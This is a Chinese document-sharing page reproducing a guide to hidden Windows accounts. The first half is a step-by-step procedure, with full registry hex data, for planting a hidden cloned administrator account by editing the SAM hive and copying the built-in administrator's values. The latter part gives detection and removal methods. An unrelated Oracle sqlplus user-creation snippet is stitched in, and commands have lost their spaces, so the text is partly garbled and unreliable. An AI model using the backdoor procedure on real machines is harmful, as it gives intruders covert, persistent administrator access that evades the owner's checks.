win下建立隐藏系统用户与查看及删除方法Word格式.docx

上传人:b****6 文档编号:18953337 上传时间:2023-01-02 格式:DOCX 页数:4 大小:17.15KB
下载 相关 举报
win下建立隐藏系统用户与查看及删除方法Word格式.docx_第1页
第1页 / 共4页
win下建立隐藏系统用户与查看及删除方法Word格式.docx_第2页
第2页 / 共4页
win下建立隐藏系统用户与查看及删除方法Word格式.docx_第3页
第3页 / 共4页
win下建立隐藏系统用户与查看及删除方法Word格式.docx_第4页
第4页 / 共4页
亲,该文档总共4页,全部预览完了,如果喜欢就下载吧!
下载资源
资源描述

win下建立隐藏系统用户与查看及删除方法Word格式.docx

《win下建立隐藏系统用户与查看及删除方法Word格式.docx》由会员分享,可在线阅读,更多相关《win下建立隐藏系统用户与查看及删除方法Word格式.docx(4页珍藏版)》请在冰豆网上搜索。

win下建立隐藏系统用户与查看及删除方法Word格式.docx

&

运行,输入regedt32.exe,找到HKEY_LOCAL_MACHINE下的SAM项下的SAM,点击右键—权限,在安全选项卡中添加用户组Administrators或者当前用户,允许完全控制,应用确定后关闭。

开始—&

运行,输入regedit打注册表。

找到HKEY_LOCAL_MACHINE—SAM—SAM—Domains—Aliases—Users—Names—sxitn$,记住右边的值的类型—&

3ef,然后导出,命名为sxitn$.reg;

在Users项中找到3ef项,也同样导出,命名为3ef.reg;

1f4(administrator默认的项)项也导出,命名为1f4.reg。

用记事本打开1f4.reg,复制:

"

F"

=hex:

02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,/

00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,/

f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,/

00,00,00,00,00,00,00

用记事本打开3ef.reg,把刚才复制的粘贴到相应的位置。

用记事本打开sxitn$.reg,复制:

[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/sxitn$]

@=hex(3ef):

粘贴到3ef.reg最后的位置。

最后3ef.reg为:

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EF]

02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/

00,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/

ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,/

00,95,7c,4e,2e,20,74

V"

00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00,00,00,00,00,00,/

00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,/

c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,/

00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,/

00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,/

00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,/

08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4,00,00,00,14,/

00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00,00,00,04,00,/

00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,/

00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,/

00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,/

00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,/

00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18,00,ff,07,0f,/

00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,/

01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,/

02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,78,00,69,00,/

74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41,62,8b,c0,6f,/

1e,57,d2,4c,dc,4e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,/

bc,1e,8d,15,01,00,01,00,01,00,01,00

然后保存。

删除用户sxitn$:

netusersxitn$/delete

之后运行3ef.reg导入注册表!

打开regedt32.exe把SAM安全选项卡中的administrator删除,然后应用。

这样,隐藏用户就建立好了。

怎样查看账号创建时间

1、在你安装的时候有一个设置密码,那个密码是你的数据库管理员的密码,一定要记住。

2、等数据库安装好之后,启动oracle数据库服务后,用下面的命令就可以进入sqlplus,在cmd中输入sqlplussys/密码assysdba

3、进入数据库后用下面的命令建用户:

createuseruser_nameidnentifiedbypassword;

grantresource,connecttouser_name;

4、现在sqlplus就可以进入了,在cmd中输入sqlplususer_name/password查看WIN2003服务器下是否加入了隐藏账户

修改注册表型隐藏账户

由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到注册表中删除隐藏账户。

来到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”,把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。

想要删除它也很简单,直接删除以隐藏账户命名的项即可。

使用regedit打开注册表编辑器

找到[HKEY_LOCAL_MACHINE]——[SAM]——[SAM]——[Domains]——[Account]——[Users],这里下面的数字和字母组合的子键是你计算机中所有用户帐户的SAM项。

子分支[Names]下是用户名,每个对应上面的SAM项。

查找隐藏的帐户就比较两个用户名的SAM值完全一样的就说明其中一个是克隆帐户。

你可以在这里删除其用户名。

一般推荐分别导出用户名项和对应的SAM,然后找一个关键字分析比较。

具体比较的方法多种多样自己看了。

目前有种系统级后门,可以在有管理员帐户登入的时候自动删除这里的克隆帐户值,等你退出了又自动恢复。

遇到这种的情况,这里是查不出来的。

一般这种后门都是高手搞的,免杀。

遇到这种情况,建议找专业安全人员处理。

另外:

本地安全策略——本地策略——安全选项中可以查看默认管理员和贵宾帐户,这里可以查出默认的guest是否被克隆了,如果这个帐户被克隆这里会显示出真正的克隆后的用户名。

计算机管理中显示的依然是正常的用户,所以查那里是没什么意义的。

另一种解决办法开始--运行

cmd下

运行.........

netlocalgroupadministrators

看看那加了$的就是隐藏的账户了1、右键单击“我的电脑”→“管理”→“计算机管理”→“本地用户和组”→“用户”→看看有没有陌生用户

2、“开始”→“运行”→“cmd”→“netuser”→看看有没有陌生用户

隐藏账户在上述中看不到的

3、“开始”→“运行”→“cmd”→“regedit”→找到注册表分支

“HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/”→看看有没有克隆用户

无法看到名称的隐藏账户

如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。

那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建立的隐藏账户名称。

不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。

点击“开始”→“运行”,输入“gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。

对“审核登陆事件”和“审核过程追踪”进行相同的设置。

  进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。

即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账户就暴露无疑了。

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 求职职场 > 职业规划

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1